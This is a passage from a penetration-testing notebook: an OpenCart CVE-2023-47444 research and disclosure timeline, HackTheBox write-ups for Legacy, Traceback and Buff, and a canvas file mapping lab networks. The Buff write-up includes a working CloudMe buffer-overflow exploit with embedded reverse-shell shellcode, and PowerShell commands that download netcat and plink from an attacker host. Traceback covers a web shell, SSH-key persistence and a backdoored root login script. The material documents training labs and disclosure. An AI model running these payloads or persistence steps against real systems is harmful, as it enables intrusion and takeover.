--------------------------------------------------------------------------------
/Labs/Lab 2 - Vuln. Research/opencart - CVE-2023-47444.md:
--------------------------------------------------------------------------------
1 | ---
2 | category:
3 | - Web
4 | tags:
5 | - opencart
6 | - open-redirection
7 | - XSS
8 | - CSRF
9 | - path-traversal
10 | - vulnerability-research
11 | - code-review
12 | - RCE
13 | - vulnerability-research/finished
14 | last-time: 2023-10-15
15 | ---
16 |
17 | # General Information
18 | ## Time-line
19 |
20 | >[!summary] Events and findings timeline:
21 | >**06/07/2023**:
22 | >- Set up the environment and started the analysis
23 | >
24 | >**25/09/2023**:
25 | >- Tested and confirmed CVE-2023-2315 - Path Traversal in `log.php`, allowing to clear any writable file
26 | >- Discovered a Path Traversal in `common/filemanager` which allows to enumerate filesystem's directories
27 | >- Found an arbitrary file upload in `common/filemanager.upload` but cannot change extensions
28 | >- Found an arbitrary file upload in `catalog/download.upload` but cannot guess the final name
29 | >
30 | >**01/10/2023:**
31 | >- Tested various bypasses and chains in order to escalate severity for Path Traversal and File upload, but without success
32 | >- Discovered a Self-Reflected XSS in `catalog/product.form` caused by CKEditor
33 | >- Noticed that `user_token` is not included in the Referer header when GET requests are sent cross-origin → [Default Referrer-Policy]()
34 | >- Discovered a parameter pollution and open redirection in `account/login.login`
35 | >- Tested Gift and Coupon functionality: no race conditions were found; it seems that only one code per purchase is allowed. To be investigated further...
36 | >
37 | >**11/10/2023:**
38 | >- Discovered a path traversal in `common/security.storage` that allows to copy the content of `/system` anywhere in the filesystem
39 | >- Discovered a RCE in `common/security.storage` caused because the `config.php` can be overwritten with any arbitrary value
40 | >
41 | >**12/10/2023**:
42 | >- Fixed the PoC so that application keeps working as intended
43 | >
44 | >**13/10/2023:**
45 | >- Discovered a RCE in `common/security.admin`, caused by the fact that the new `config.php` can be created with injected arbitrary PHP code
46 | >
47 | >**14/10/2023**:
48 | >- Finished looking all the `$file` references, without finding anything new
49 | >- Looked at forgot password, login and registration process, without finding anything suspicious
50 | >
51 | > **17/10/2023**:
52 | > - Contacted OpenCart at support@opencart.com
53 | >
54 | >**24/10/2023**:
55 | >- Contacted OpenCart at webmaster@opencart.com
56 | >
57 | >**30/10/2023**:
58 | >- Published a post (https://forum.opencart.com/viewtopic.php?t=232348) on the official OpenCart forum as a final attempt to contact the OpenCart team
59 | >
60 | >**02/11/2023**:
61 | >- Sent a PM to an Administrator on the official OpenCart forum as a very last resort to contact the OpenCart staff.
62 | >
63 | >
64 | >**10/11/2023**:
65 | >- Assigned CVE-2023-47444
66 | >
67 | >- **10/11/2023**: Sent a PM to another Administrator on the official OpenCart forum as a very last resort to contact the OpenCart staff.
68 | >- **11/11/2023**: Get a _kindly_ response from an OpenCart Administrator
69 | >- **14/11/2023**: Public release and opened a GitHub issue ([#12947](https://github.com/opencart/opencart/issues/12947))
70 | >- **15/11/2023**: Opened a pull request ([#12949](https://github.com/opencart/opencart/pull/12949)) with a hotfix, but closed immediately by administrator. GitHub issue also closed by administrator after having marked it as spam and a “non vulnerability”.
71 | >- **16/11/2023**: Fix ([#12951](https://github.com/opencart/opencart/pull/12951)) merged to master
72 |
73 | ## Canvas
74 |
75 | 
76 |
77 | # Set Up
78 |
79 | - Downloaded archive: https://github.com/opencart/opencart/releases/tag/4.0.2.2
80 | - Web server: Apache + MySQL
81 |
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 1/Legacy.md:
--------------------------------------------------------------------------------
1 | ---
2 | tags:
3 | - HackTheBox
4 | - Easy
5 | - Windows
6 | - MS08-067
7 | - CVE-2008-4250
8 | - RCE
9 | - B2R
10 | aliases:
11 | - 10.10.10.4
12 | ---
13 |
14 | # Legacy - 10.10.10.4 [Easy]
15 |
16 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
17 | Hacking is fun if you're a Hacker.
18 | - Anonymous
19 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
20 |
21 |
22 | ## Information Gathering
23 | ```
24 | PORT STATE SERVICE VERSION
25 | 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
26 | 137/udp open netbios-ns
27 | 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
28 | Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
29 | Device type: general purpose
30 | Running: Microsoft Windows XP|7|2012
31 | OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2012
32 | OS details: Microsoft Windows XP SP3, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012
33 | Network Distance: 2 hops
34 | Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
35 | ```
36 | ## Enumeration
37 | ``` bash
38 | root@kali:~/ownCloud/Documents/CTF/HTB/Machine/Legacy# enum4linux 10.10.10.4
39 | Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Mar 12 11:59:25 2020
40 |
41 | ==========================
42 | | Target Information |
43 | ==========================
44 | Target ........... 10.10.10.4
45 | RID Range ........ 500-550,1000-1050
46 | Username ......... ''
47 | Password ......... ''
48 | Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
49 |
50 |
51 | ==================================================
52 | | Enumerating Workgroup/Domain on 10.10.10.4 |
53 | ==================================================
54 | [+] Got domain/workgroup name: HTB
55 |
56 | ==========================================
57 | | Nbtstat Information for 10.10.10.4 |
58 | ==========================================
59 | Looking up status of 10.10.10.4
60 | LEGACY <00> - B Workstation Service
61 | HTB <00> - B Domain/Workgroup Name
62 | LEGACY <20> - B File Server Service
63 | HTB <1e> - B Browser Service Elections
64 | HTB <1d> - B Master Browser
65 | ..__MSBROWSE__. <01> - B Master Browser
66 |
67 | MAC Address = 00-50-56-B9-28-22
68 |
69 | ===================================
70 | | Session Check on 10.10.10.4 |
71 | ===================================
72 | [E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.
73 | ```
74 | ```bash
75 | Host script results:
76 | | smb-enum-shares:
77 | | note: ERROR: Enumerating shares failed, guessing at common ones (NT_STATUS_ACCESS_DENIED)
78 | | account_used:
79 | | \\10.10.10.4\ADMIN$:
80 | | warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
81 | | Anonymous access:
82 | | \\10.10.10.4\C$:
83 | | warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
84 | | Anonymous access:
85 | | \\10.10.10.4\IPC$:
86 | | warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
87 | |_ Anonymous access: READ
88 |
89 | Host script results:
90 | | smb-vuln-ms08-067:
91 | | VULNERABLE:
92 | | Microsoft Windows system vulnerable to remote code execution (MS08-067)
93 | | State: VULNERABLE
94 | | IDs: CVE:CVE-2008-4250
95 | | The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
96 | | Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
97 | | code via a crafted RPC request that triggers the overflow during path canonicalization.
98 | |
99 | | Disclosure date: 2008-10-23
100 | | References:
101 | | https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
102 | |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
103 | |_smb-vuln-ms10-054: ERROR: Script execution failed (use -d to debug)
104 | |_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
105 | | smb-vuln-ms17-010:
106 | | VULNERABLE:
107 | | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
108 | | State: VULNERABLE
109 | | IDs: CVE:CVE-2017-0143
110 | | Risk factor: HIGH
111 | | A critical remote code execution vulnerability exists in Microsoft SMBv1
112 | | servers (ms17-010).
113 | |
114 | | Disclosure date: 2017-03-14
115 | | References:
116 | | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
117 | | https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
118 | |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
119 | ```
120 | ## Exploit
121 | ![[attachments/1 (2).png]]
122 | ![[attachments/2 (2).png]]
123 |
124 | john: `e69af0e4f443de7e36876fda4ec7644f`
125 | Root: `993442d258b0e0ec917cae9e695d5713`
126 |
127 |
128 |
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/LAB 1.canvas:
--------------------------------------------------------------------------------
1 | {
2 | "edges": [
3 | {
4 | "fromEnd": "arrow",
5 | "fromNode": "c887a6cac33a7cc2",
6 | "fromSide": "right",
7 | "id": "9393bcb9818bbd10",
8 | "label": "shared credentials",
9 | "styleAttributes": {
10 | "path": "long-dashed"
11 | },
12 | "toNode": "72573fc592971e42",
13 | "toSide": "left"
14 | },
15 | {
16 | "fromNode": "d1827057f6a51d3e",
17 | "fromSide": "right",
18 | "id": "5e58ca7eed53c1ad",
19 | "label": "cron job",
20 | "styleAttributes": {
21 | "pathfindingMethod": "square"
22 | },
23 | "toNode": "72573fc592971e42",
24 | "toSide": "right"
25 | },
26 | {
27 | "fromNode": "d04166e5e9ed24b9",
28 | "fromSide": "right",
29 | "id": "4f2e1030ed334906",
30 | "label": "DMZ machine",
31 | "styleAttributes": {
32 | },
33 | "toNode": "b7610d496b7f5adf",
34 | "toSide": "left"
35 | },
36 | {
37 | "fromNode": "e9fdb96754442a77",
38 | "fromSide": "right",
39 | "id": "7a8caeae814ae697",
40 | "label": "double interface",
41 | "styleAttributes": {
42 | "path": "dotted",
43 | "pathfindingMethod": "square"
44 | },
45 | "toEnd": "none",
46 | "toNode": "ab788f62574ded0b",
47 | "toSide": "left"
48 | },
49 | {
50 | "fromEnd": "arrow",
51 | "fromNode": "d1827057f6a51d3e",
52 | "fromSide": "bottom",
53 | "id": "7f86e047789e05f4",
54 | "label": "double interface",
55 | "styleAttributes": {
56 | "path": "dotted"
57 | },
58 | "toNode": "86c50356a8efccce",
59 | "toSide": "top"
60 | },
61 | {
62 | "fromNode": "d04166e5e9ed24b9",
63 | "fromSide": "bottom",
64 | "id": "5b2bb03674cd6538",
65 | "label": "ssh -D foo@bar ...",
66 | "styleAttributes": {
67 | "arrow": null,
68 | "path": "short-dashed"
69 | },
70 | "toNode": "666398e56a7eb27e",
71 | "toSide": "left"
72 | }
73 | ],
74 | "nodes": [
75 | {
76 | "color": "3",
77 | "height": 720,
78 | "id": "666398e56a7eb27e",
79 | "label": "Network 3",
80 | "styleAttributes": {
81 | },
82 | "type": "group",
83 | "width": 2130,
84 | "x": -840,
85 | "y": 920
86 | },
87 | {
88 | "color": "5",
89 | "height": 1360,
90 | "id": "5ea77688a36a43f9",
91 | "label": "Network 1",
92 | "styleAttributes": {
93 | },
94 | "type": "group",
95 | "width": 720,
96 | "x": -640,
97 | "y": -640
98 | },
99 | {
100 | "color": "2",
101 | "height": 1360,
102 | "id": "7a6da4a21013d326",
103 | "label": "Network 2",
104 | "styleAttributes": {
105 | },
106 | "type": "group",
107 | "width": 700,
108 | "x": 320,
109 | "y": -640
110 | },
111 | {
112 | "color": "2",
113 | "height": 100,
114 | "id": "72573fc592971e42",
115 | "styleAttributes": {
116 | "textAlign": "center"
117 | },
118 | "text": "# [Postman](Network%202/Postman.md)",
119 | "type": "text",
120 | "width": 240,
121 | "x": 550,
122 | "y": -470
123 | },
124 | {
125 | "color": "1",
126 | "height": 100,
127 | "id": "d1827057f6a51d3e",
128 | "styleAttributes": {
129 | "textAlign": "center"
130 | },
131 | "text": "# [OpenAdmin](Network%202/OpenAdmin.md)",
132 | "type": "text",
133 | "width": 260,
134 | "x": 550,
135 | "y": 350
136 | },
137 | {
138 | "color": "4",
139 | "height": 120,
140 | "id": "ab788f62574ded0b",
141 | "styleAttributes": {
142 | },
143 | "text": "# [Buff](Network%201/Buff.md)",
144 | "type": "text",
145 | "width": 260,
146 | "x": 340,
147 | "y": -60
148 | },
149 | {
150 | "file": "Labs/Lab 1 - Example/Network 1/_Network 1 discovered IPs.md",
151 | "height": 200,
152 | "id": "7010c9c9b5862095",
153 | "styleAttributes": {
154 | },
155 | "type": "file",
156 | "width": 460,
157 | "x": -380,
158 | "y": -840
159 | },
160 | {
161 | "color": "1",
162 | "file": "Labs/Lab 1 - Example/Network 3/Tabby.md",
163 | "height": 400,
164 | "id": "2d9ffd18998632f9",
165 | "styleAttributes": {
166 | },
167 | "type": "file",
168 | "width": 400,
169 | "x": -590,
170 | "y": 1080
171 | },
172 | {
173 | "color": "1",
174 | "file": "Labs/Lab 1 - Example/Network 3/Traceback.md",
175 | "height": 400,
176 | "id": "18b4403b0e055c7e",
177 | "styleAttributes": {
178 | },
179 | "type": "file",
180 | "width": 400,
181 | "x": 30,
182 | "y": 1080
183 | },
184 | {
185 | "color": "1",
186 | "height": 100,
187 | "id": "86c50356a8efccce",
188 | "styleAttributes": {
189 | "textAlign": "center"
190 | },
191 | "text": "# [OpenAdmin](Network%202/OpenAdmin.md)",
192 | "type": "text",
193 | "width": 260,
194 | "x": 690,
195 | "y": 1080
196 | },
197 | {
198 | "color": "2",
199 | "file": "Labs/Lab 1 - Example/Network 1/Legacy.md",
200 | "height": 280,
201 | "id": "c887a6cac33a7cc2",
202 | "styleAttributes": {
203 | },
204 | "type": "file",
205 | "width": 500,
206 | "x": -530,
207 | "y": -560
208 | },
209 | {
210 | "color": "4",
211 | "file": "Labs/Lab 1 - Example/Network 1/Buff.md",
212 | "height": 360,
213 | "id": "e9fdb96754442a77",
214 | "styleAttributes": {
215 | },
216 | "type": "file",
217 | "width": 500,
218 | "x": -530,
219 | "y": -220
220 | },
221 | {
222 | "color": "4",
223 | "file": "Labs/Lab 1 - Example/Network 1/Writeup.md",
224 | "height": 400,
225 | "id": "b7610d496b7f5adf",
226 | "styleAttributes": {
227 | },
228 | "type": "file",
229 | "width": 500,
230 | "x": -530,
231 | "y": 200
232 | },
233 | {
234 | "color": "6",
235 | "height": 140,
236 | "id": "d04166e5e9ed24b9",
237 | "styleAttributes": {
238 | "textAlign": "center"
239 | },
240 | "text": "# Attacker machine",
241 | "type": "text",
242 | "width": 280,
243 | "x": -1120,
244 | "y": -630
245 | }
246 | ]
247 | }
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 3/Traceback.md:
--------------------------------------------------------------------------------
1 | ---
2 | Tags: HackTheBox Easy Linux OSINT luvit lua lateral-movement insecure-file-permissions B2R
3 | Alias: Traceback - 10.10.10.181
4 | ---
5 | # 10.10.10.181 - Traceback [Easy]
6 |
7 | 
8 |
9 | ***
10 |
11 | ### Improved skills:
12 |
13 | - OSINT
14 | - Luvit lateral movement
15 | - motd privilege escalation
16 |
17 | ### Used tools:
18 |
19 | - nmap
20 | - owasp zap
21 | - pspy64
22 | - netcat
23 |
24 | ***
25 |
26 |
27 |
28 | ## Introduction & Foothold
29 |
30 | Like in every CTF, let's start by scanning the box with **nmap**:
31 |
32 | ```bash
33 | $ nmap 10.10.10.181 --top-ports 25 --open -sC -sV -oA nmap/openPorts.txt
34 | PORT STATE SERVICE VERSION
35 | 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
36 | | ssh-hostkey:
37 | | 2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
38 | | 256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
39 | |_ 256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
40 | 80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
41 | |_http-server-header: Apache/2.4.29 (Ubuntu)
42 | |_http-title: Help us
43 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
44 | ```
45 |
46 | As we can see, there are only two services exposed: **SSH** (port 22) and the **Apache Web Server** (port 80).
47 |
48 | Visiting the site, we discover that the machine **has been owned** and _there is a backdoor_
49 |
50 | ![[HTB/Machines/Traceback - 10.10.10.181/attachments/1.png]]
51 |
52 |
53 | Looking at the source code of the page, a comment stands out.
54 |
55 | ![[HTB/Machines/Traceback - 10.10.10.181/attachments/2.png]]
56 |
57 | Searching for it on Google reveals that it is the description of a repo containing only web shells. _We can suppose that one of those shells is the one used on this machine_.
58 |
59 | Assuming this, let's **create a wordlist using the discovered shells' names** and **fuzz** the web page in order to find the correct one.
60 |
61 | ![[HTB/Machines/Traceback - 10.10.10.181/attachments/3.png]]
62 |
63 | ![[HTB/Machines/Traceback - 10.10.10.181/attachments/4.png]]
64 |
65 | **Bingo!** `smevk.php` is the web shell used on the box.
66 |
67 | ![[HTB/Machines/Traceback - 10.10.10.181/attachments/5.png]]
68 |
69 | **Credentials** can be found **in the source code on GitHub.** The combination is the easily guessable `admin:admin`.
70 |
71 | ![[attachments/6.png]]
72 |
73 | Once inside, we can easily submit commands to the box.
74 | In order to get a more stable and comfortable shell, **I added my SSH key to the `authorized_keys` file**, obtaining an SSH access as **webadmin**.
75 |
76 | ![[attachments/7.png]]
77 |
78 | ![[attachments/8.png]]
79 |
80 | ## Lateral Movement to sysadmin
81 |
82 | Listing all the files within the webadmin home directory, we discovered the presence of [Luvit](https://luvit.io/), a
83 |
84 | > scripting platform just like `node`. This can be used to run lua scripts as standalone servers, clients, or other tools.
85 |
86 | Furthermore, **webadmin has permission to run luvit as sysadmin** using **sudo**. It becomes easy to perform actions as sysadmin, like reading files
87 |
88 | ![[attachments/9.png]]
89 | or getting a shell:
90 |
91 | ![[attachments/10.png]]
92 |
93 | ## Privilege Escalation
94 |
95 | Analyzing the processes running on the machine, I noticed the **presence of a script executed by root that is modifiable by sysadmin**.
96 |
97 | ```bash
98 | 2020/03/15 15:45:01 CMD: UID=106 PID=28288 | sshd: [net]
99 | 2020/03/15 15:45:01 CMD: UID=0 PID=28290 | run-parts --lsbsysinit /etc/update-motd.d
100 | 2020/03/15 15:45:01 CMD: UID=0 PID=28289 | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
101 | 2020/03/15 15:45:01 CMD: UID=0 PID=28297 | cut -c -80
102 | 2020/03/15 15:45:01 CMD: UID=0 PID=28296 |
103 | 2020/03/15 15:45:01 CMD: UID=0 PID=28295 |
104 | 2020/03/15 15:45:01 CMD: UID=0 PID=28293 | /bin/sh /etc/update-motd.d/50-motd-news
105 | 2020/03/15 15:45:01 CMD: UID=0 PID=28298 | run-parts --lsbsysinit /etc/update-motd.d
106 | 2020/03/15 15:45:01 CMD: UID=0 PID=28299 | /usr/bin/python3 -Es /usr/bin/lsb_release -cs
107 | 2020/03/15 15:45:01 CMD: UID=0 PID=28301 | /usr/sbin/CRON -f
108 | 2020/03/15 15:45:01 CMD: UID=0 PID=28300 | /usr/sbin/CRON -f
109 | 2020/03/15 15:45:01 CMD: UID=0 PID=28305 | /bin/cp /var/backups/.update-motd.d/00-header /var/backups/.update-motd.d/10-help-text /var/backups/.update-motd.d/50-motd-news /var/backups/.update-motd.d/80-esm /var/backups/.update-motd.d/91-release-upgrade /etc/update-motd.d/
110 | 2020/03/15 15:45:01 CMD: UID=0 PID=28304 | sleep 30
111 | 2020/03/15 15:45:01 CMD: UID=0 PID=28303 | /bin/sh -c /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/
112 | 2020/03/15 15:45:01 CMD: UID=0 PID=28302 | /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/
113 | 2020/03/15 15:45:01 CMD: UID=0 PID=28306 | /usr/bin/python3 -Es /usr/bin/lsb_release -ds
114 | 2020/03/15 15:45:01 CMD: UID=0 PID=28307 | /bin/sh /etc/update-motd.d/91-release-upgrade
115 | 2020/03/15 15:45:01 CMD: UID=0 PID=28310 | cut -d -f4
116 | 2020/03/15 15:45:01 CMD: UID=0 PID=28309 | /usr/bin/python3 -Es /usr/bin/lsb_release -sd
117 | 2020/03/15 15:45:01 CMD: UID=0 PID=28308 | /bin/sh /etc/update-motd.d/91-release-upgrade
118 | 2020/03/15 15:45:02 CMD: UID=0 PID=28315 | sshd: sysadmin [priv]
119 | 2020/03/15 15:45:02 CMD: UID=1001 PID=28316 | -sh
120 | ```
121 |
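122 | `/etc/update-motd.d/50-motd-news` is run **every time a user logs into the box**, with **root privileges**. However, **this file can be edited by non-root users**. The root cause is a file-permission issue: scripts in `/etc/update-motd.d/` are executed as root, so they should be owned by root and not be writable by any other user or group.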
123 | Abusing this issue, let's use the reverse shell script used before in order to obtain a reverse shell as root at the next login.
124 |
125 | ```bash
126 | sysadmin@traceback:~$ nano /etc/update-mot.d/50-motd-news
127 |
128 | #!/bin/bash
129 | /bin/bash /tmp/revShell.sh
130 | ...
131 | ```
132 |
133 | ![[attachments/11.png]]
134 |
135 | ## Trophy
136 |
137 | > Aim for the sky, but move slowly, enjoying every step along the way.
138 | > It is all those little steps that make the journey complete.
139 | > \- Chanda Kochhar
140 |
141 |
142 | ## License
143 |
144 | Author: 0x*bro*
145 |
146 |
147 | This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 1/Buff.md:
--------------------------------------------------------------------------------
1 | ---
2 | tags:
3 | - HackTheBox
4 | - Easy
5 | - B2R
6 | - Windows
7 | - Gym-Management-System
8 | - RCE
9 | - Buffer-Overflow
10 | - CloudMe
11 | - port-forwarding
12 | aliases:
13 | - 10.10.10.198
14 | ---
15 |
16 | # 10.10.10.198 - Buff [Easy]
17 |
18 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
19 | It is better to have your head in the clouds, and know where you are... than to breathe the clearer atmosphere below them, and think that you are in paradise.
20 | - Henry David Thoreau
21 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
22 |
23 | ## Information Gathering
24 | ``` bash
25 | root@kali:~/CTF/HackTheBox/Machine/Buff# nmap 10.10.10.198 -p 8080,7680 -sC -oA files/nmap/open-services
26 | Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-22 21:43 CEST
27 | Nmap scan report for 10.10.10.198
28 | Host is up (0.037s latency).
29 |
30 | PORT STATE SERVICE
31 | 7680/tcp open pando-pub
32 | 8080/tcp open http-proxy
33 | |_http-open-proxy: Proxy might be redirecting requests
34 | |_http-title: mrb3n's Bro Hut
35 |
36 | Nmap done: 1 IP address (1 host up) scanned in 10.76 seconds
37 | ```
38 |
39 |
40 | 
41 |
42 | “Gym Management Software 1.0” == **Gym Management System 1.0**
43 | https://www.exploit-db.com/exploits/48506
44 |
45 | 
46 |
47 | 
48 |
49 | `4b5b023a28f09d7bbace384b13095dfe`
50 |
51 | ## Privilege Escalation
52 | ``` powershell
53 | echo $webclient = New-Object System.Net.WebClient >wget.ps1
54 | echo $url = "http://10.10.14.39/nc.exe" >>wget.ps1
55 | echo $file = "nc.exe" >>wget.ps1
56 | echo $webclient.DownloadFile($url,$file) >>wget.ps1
57 |
58 | powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
59 | ```
60 | 
61 | ``` powershell
62 | Proto Local Address Foreign Address State
63 |
64 | TCP 0.0.0.0:135 BUFF:0 LISTENING
65 | TCP 0.0.0.0:445 BUFF:0 LISTENING
66 | TCP 0.0.0.0:5040 BUFF:0 LISTENING
67 | TCP 0.0.0.0:7680 BUFF:0 LISTENING
68 | TCP 0.0.0.0:8080 BUFF:0 LISTENING
69 | TCP 0.0.0.0:49664 BUFF:0 LISTENING
70 | TCP 0.0.0.0:49665 BUFF:0 LISTENING
71 | TCP 0.0.0.0:49666 BUFF:0 LISTENING
72 | TCP 0.0.0.0:49667 BUFF:0 LISTENING
73 | TCP 0.0.0.0:49668 BUFF:0 LISTENING
74 | TCP 0.0.0.0:49669 BUFF:0 LISTENING
75 | TCP 10.10.10.198:139 BUFF:0 LISTENING
76 | TCP 10.10.10.198:8080 10.10.14.29:48092 ESTABLISHED
77 | TCP 10.10.10.198:8080 10.10.14.39:40996 CLOSE_WAIT
78 | TCP 10.10.10.198:8080 10.10.14.39:41084 ESTABLISHED
79 | TCP 10.10.10.198:49697 10.10.14.39:http ESTABLISHED
80 | TCP 10.10.10.198:49707 10.10.14.29:4000 ESTABLISHED
81 | TCP 127.0.0.1:3306 BUFF:0 LISTENING
82 | TCP 127.0.0.1:8888 BUFF:0 LISTENING
83 | ```
84 | https://www.exploit-db.com/exploits/48389
85 | https://bufferoverflows.net/practical-exploitation-part-1-cloudme-sync-1-11-2-bufferoverflow-seh/
86 |
87 | Copied the CloudMe_1112.exe file locally and tested it on a dev machine.
88 | Minimal substitutions to 48389.py
89 | ``` python
90 | # Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
91 | # Date: 2020-04-27
92 | # Exploit Author: Andy Bowden
93 | # Vendor Homepage: https://www.cloudme.com/en
94 | # Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
95 | # Version: CloudMe 1.11.2
96 | # Tested on: Windows 10 x86
97 |
98 | #Instructions:
99 | # Start the CloudMe service and run the script.
100 |
101 | import socket
102 |
103 | target = "127.0.0.1"
104 |
105 | padding1 = b"\x90" * 1052
106 | EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
107 | NOPS = b"\x90" * 30
108 |
109 | #msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.39 LPORT=443 -a x86 -f python -b '\x00\x0A\x0D' --> LEN 351
110 | buf = b""
111 | buf += b"\xbd\xae\xea\xd2\xc4\xd9\xc3\xd9\x74\x24\xf4\x58\x31"
112 | buf += b"\xc9\xb1\x52\x31\x68\x12\x83\xc0\x04\x03\xc6\xe4\x30"
113 | buf += b"\x31\xea\x11\x36\xba\x12\xe2\x57\x32\xf7\xd3\x57\x20"
114 | buf += b"\x7c\x43\x68\x22\xd0\x68\x03\x66\xc0\xfb\x61\xaf\xe7"
115 | buf += b"\x4c\xcf\x89\xc6\x4d\x7c\xe9\x49\xce\x7f\x3e\xa9\xef"
116 | buf += b"\x4f\x33\xa8\x28\xad\xbe\xf8\xe1\xb9\x6d\xec\x86\xf4"
117 | buf += b"\xad\x87\xd5\x19\xb6\x74\xad\x18\x97\x2b\xa5\x42\x37"
118 | buf += b"\xca\x6a\xff\x7e\xd4\x6f\x3a\xc8\x6f\x5b\xb0\xcb\xb9"
119 | buf += b"\x95\x39\x67\x84\x19\xc8\x79\xc1\x9e\x33\x0c\x3b\xdd"
120 | buf += b"\xce\x17\xf8\x9f\x14\x9d\x1a\x07\xde\x05\xc6\xb9\x33"
121 | buf += b"\xd3\x8d\xb6\xf8\x97\xc9\xda\xff\x74\x62\xe6\x74\x7b"
122 | buf += b"\xa4\x6e\xce\x58\x60\x2a\x94\xc1\x31\x96\x7b\xfd\x21"
123 | buf += b"\x79\x23\x5b\x2a\x94\x30\xd6\x71\xf1\xf5\xdb\x89\x01"
124 | buf += b"\x92\x6c\xfa\x33\x3d\xc7\x94\x7f\xb6\xc1\x63\x7f\xed"
125 | buf += b"\xb6\xfb\x7e\x0e\xc7\xd2\x44\x5a\x97\x4c\x6c\xe3\x7c"
126 | buf += b"\x8c\x91\x36\xd2\xdc\x3d\xe9\x93\x8c\xfd\x59\x7c\xc6"
127 | buf += b"\xf1\x86\x9c\xe9\xdb\xae\x37\x10\x8c\xda\xcd\x14\x6b"
128 | buf += b"\xb3\xd3\x28\x72\xf8\x5d\xce\x1e\xee\x0b\x59\xb7\x97"
129 | buf += b"\x11\x11\x26\x57\x8c\x5c\x68\xd3\x23\xa1\x27\x14\x49"
130 | buf += b"\xb1\xd0\xd4\x04\xeb\x77\xea\xb2\x83\x14\x79\x59\x53"
131 | buf += b"\x52\x62\xf6\x04\x33\x54\x0f\xc0\xa9\xcf\xb9\xf6\x33"
132 | buf += b"\x89\x82\xb2\xef\x6a\x0c\x3b\x7d\xd6\x2a\x2b\xbb\xd7"
133 | buf += b"\x76\x1f\x13\x8e\x20\xc9\xd5\x78\x83\xa3\x8f\xd7\x4d"
134 | buf += b"\x23\x49\x14\x4e\x35\x56\x71\x38\xd9\xe7\x2c\x7d\xe6"
135 | buf += b"\xc8\xb8\x89\x9f\x34\x59\x75\x4a\xfd\x69\x3c\xd6\x54"
136 | buf += b"\xe2\x99\x83\xe4\x6f\x1a\x7e\x2a\x96\x99\x8a\xd3\x6d"
137 | buf += b"\x81\xff\xd6\x2a\x05\xec\xaa\x23\xe0\x12\x18\x43\x21"
138 |
139 | overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + buf))
140 |
141 | expl = padding1 + EIP + NOPS + buf + overrun
142 |
143 | try:
144 | s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
145 | s.connect((target,8888))
146 | s.send(expl)
147 | except Exception as e:
148 | print(sys.exc_value)
149 | ```
150 |
151 | ``` powershell
152 | echo '$webclient = New-Object System.Net.WebClient' > wget.ps1
153 | echo '$url = "http://10.10.14.39/plink-x64.exe"' >>wget.ps1
154 | echo '$file = "plink.exe"' >>wget.ps1
155 | echo '$webclient.DownloadFile($url,$file)' >>wget.ps1
156 |
157 | powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
158 |
159 | .\plink.exe -ssh -l root -R 8888:127.0.0.1:8888 10.10.14.39
160 | ```
161 | 
162 | 
163 | 
164 |
165 | `a19f68f858b4464cdc8a7d5415d7bd0f`
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 1/Writeup.md:
--------------------------------------------------------------------------------
1 | ---
2 | tags:
3 | - HacktheBox
4 | - Linux
5 | - Easy
6 | - CMS-Made-Simple
7 | - SQL-injection
